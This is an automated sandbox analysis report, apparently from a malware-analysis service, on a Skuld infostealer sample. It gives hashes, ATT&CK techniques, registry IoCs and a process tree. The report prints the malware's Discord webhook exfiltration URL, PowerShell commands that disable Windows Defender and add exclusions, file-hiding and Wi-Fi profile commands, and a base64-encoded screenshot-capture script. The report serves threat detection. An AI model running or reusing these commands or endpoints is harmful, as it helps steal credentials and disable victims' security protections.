skuld | 9030098c9b2ecabe713d76727ccc2be79663d55716644446bb1482d948697e17

Analysis

max time kernel
34s
max time network
38s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
31-08-2024 21:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

_protected.exe
Size

15.3MB
MD5

5bc9c103742fa7e457e906e07832c395
SHA1

142c19a8f1dd419ce9c2f251cbc263b8abf476de
SHA256

9030098c9b2ecabe713d76727ccc2be79663d55716644446bb1482d948697e17
SHA512

1633349abd47715ed0804cb08798e9b12c862fe4239953de21481a07de502d13be74879e8ce7a962c1c68e1c967b47337095cc7458c40e702023d6f241536221
SSDEEP

196608:/tp+pRF2L2DOMpQJ7c/9VI33COUkbHIHfE6wO0vEuM3Op9MnYQcHh/fT+X2DjL:SpRVhpQVc1SnzUkYE8SEb3gHpDjL

Score

10^/10

skuld credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1279552508578238534/-lGdkw-tDuy6Wd-I7APMhPnY3Tp2Oh3ZxzkvZFiG36eu6-pHpBKf4a2y4W0ZpaNYzcmk

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4788	powershell.exe
3148	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	_protected.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_protected.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	_protected.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_protected.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
13	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
8	ip-api.com
11	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	_protected.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3176	_protected.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3184	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2220	wmic.exe
896	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	12	Go-http-client/1.1

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	_protected.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	_protected.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
4788	powershell.exe
4788	powershell.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3148	powershell.exe
3176	_protected.exe
3176	_protected.exe
3148	powershell.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe
3176	_protected.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3176	_protected.exe
Token: SeIncreaseQuotaPrivilege	236	wmic.exe
Token: SeSecurityPrivilege	236	wmic.exe
Token: SeTakeOwnershipPrivilege	236	wmic.exe
Token: SeLoadDriverPrivilege	236	wmic.exe
Token: SeSystemProfilePrivilege	236	wmic.exe
Token: SeSystemtimePrivilege	236	wmic.exe
Token: SeProfSingleProcessPrivilege	236	wmic.exe
Token: SeIncBasePriorityPrivilege	236	wmic.exe
Token: SeCreatePagefilePrivilege	236	wmic.exe
Token: SeBackupPrivilege	236	wmic.exe
Token: SeRestorePrivilege	236	wmic.exe
Token: SeShutdownPrivilege	236	wmic.exe
Token: SeDebugPrivilege	236	wmic.exe
Token: SeSystemEnvironmentPrivilege	236	wmic.exe
Token: SeRemoteShutdownPrivilege	236	wmic.exe
Token: SeUndockPrivilege	236	wmic.exe
Token: SeManageVolumePrivilege	236	wmic.exe
Token: 33	236	wmic.exe
Token: 34	236	wmic.exe
Token: 35	236	wmic.exe
Token: 36	236	wmic.exe
Token: SeIncreaseQuotaPrivilege	236	wmic.exe
Token: SeSecurityPrivilege	236	wmic.exe
Token: SeTakeOwnershipPrivilege	236	wmic.exe
Token: SeLoadDriverPrivilege	236	wmic.exe
Token: SeSystemProfilePrivilege	236	wmic.exe
Token: SeSystemtimePrivilege	236	wmic.exe
Token: SeProfSingleProcessPrivilege	236	wmic.exe
Token: SeIncBasePriorityPrivilege	236	wmic.exe
Token: SeCreatePagefilePrivilege	236	wmic.exe
Token: SeBackupPrivilege	236	wmic.exe
Token: SeRestorePrivilege	236	wmic.exe
Token: SeShutdownPrivilege	236	wmic.exe
Token: SeDebugPrivilege	236	wmic.exe
Token: SeSystemEnvironmentPrivilege	236	wmic.exe
Token: SeRemoteShutdownPrivilege	236	wmic.exe
Token: SeUndockPrivilege	236	wmic.exe
Token: SeManageVolumePrivilege	236	wmic.exe
Token: 33	236	wmic.exe
Token: 34	236	wmic.exe
Token: 35	236	wmic.exe
Token: 36	236	wmic.exe
Token: SeIncreaseQuotaPrivilege	896	wmic.exe
Token: SeSecurityPrivilege	896	wmic.exe
Token: SeTakeOwnershipPrivilege	896	wmic.exe
Token: SeLoadDriverPrivilege	896	wmic.exe
Token: SeSystemProfilePrivilege	896	wmic.exe
Token: SeSystemtimePrivilege	896	wmic.exe
Token: SeProfSingleProcessPrivilege	896	wmic.exe
Token: SeIncBasePriorityPrivilege	896	wmic.exe
Token: SeCreatePagefilePrivilege	896	wmic.exe
Token: SeBackupPrivilege	896	wmic.exe
Token: SeRestorePrivilege	896	wmic.exe
Token: SeShutdownPrivilege	896	wmic.exe
Token: SeDebugPrivilege	896	wmic.exe
Token: SeSystemEnvironmentPrivilege	896	wmic.exe
Token: SeRemoteShutdownPrivilege	896	wmic.exe
Token: SeUndockPrivilege	896	wmic.exe
Token: SeManageVolumePrivilege	896	wmic.exe
Token: 33	896	wmic.exe
Token: 34	896	wmic.exe
Token: 35	896	wmic.exe
Token: 36	896	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3176 wrote to memory of 4388	3176	_protected.exe	83
PID 3176 wrote to memory of 4388	3176	_protected.exe	83
PID 3176 wrote to memory of 4624	3176	_protected.exe	84
PID 3176 wrote to memory of 4624	3176	_protected.exe	84
PID 3176 wrote to memory of 236	3176	_protected.exe	85
PID 3176 wrote to memory of 236	3176	_protected.exe	85
PID 3176 wrote to memory of 896	3176	_protected.exe	87
PID 3176 wrote to memory of 896	3176	_protected.exe	87
PID 3176 wrote to memory of 4788	3176	_protected.exe	88
PID 3176 wrote to memory of 4788	3176	_protected.exe	88
PID 3176 wrote to memory of 3008	3176	_protected.exe	89
PID 3176 wrote to memory of 3008	3176	_protected.exe	89
PID 3176 wrote to memory of 1920	3176	_protected.exe	90
PID 3176 wrote to memory of 1920	3176	_protected.exe	90
PID 3176 wrote to memory of 2220	3176	_protected.exe	91
PID 3176 wrote to memory of 2220	3176	_protected.exe	91
PID 3176 wrote to memory of 3148	3176	_protected.exe	92
PID 3176 wrote to memory of 3148	3176	_protected.exe	92
PID 3176 wrote to memory of 1864	3176	_protected.exe	93
PID 3176 wrote to memory of 1864	3176	_protected.exe	93
PID 3176 wrote to memory of 3184	3176	_protected.exe	94
PID 3176 wrote to memory of 3184	3176	_protected.exe	94
PID 3176 wrote to memory of 2884	3176	_protected.exe	95
PID 3176 wrote to memory of 2884	3176	_protected.exe	95
PID 3176 wrote to memory of 4028	3176	_protected.exe	96
PID 3176 wrote to memory of 4028	3176	_protected.exe	96
PID 3176 wrote to memory of 2008	3176	_protected.exe	97
PID 3176 wrote to memory of 2008	3176	_protected.exe	97
PID 2008 wrote to memory of 2056	2008	powershell.exe	98
PID 2008 wrote to memory of 2056	2008	powershell.exe	98
PID 2056 wrote to memory of 4284	2056	csc.exe	99
PID 2056 wrote to memory of 4284	2056	csc.exe	99

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4028	attrib.exe
4388	attrib.exe
4624	attrib.exe
2884	attrib.exe

C:\Users\Admin\AppData\Local\Temp\_protected.exe
"C:\Users\Admin\AppData\Local\Temp\_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\_protected.exe
  2⤵
  - Views/modifies file attributes
  PID:4388
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4624
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:236
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\_protected.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4788
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:3008
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:1920
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3148
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1864
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:3184
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:2884
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ycqtmehl\ycqtmehl.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B72.tmp" "c:\Users\Admin\AppData\Local\Temp\ycqtmehl\CSCC3CDCE328F34480D9A67FB1C209964A5.TMP"
      4⤵
      PID:4284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

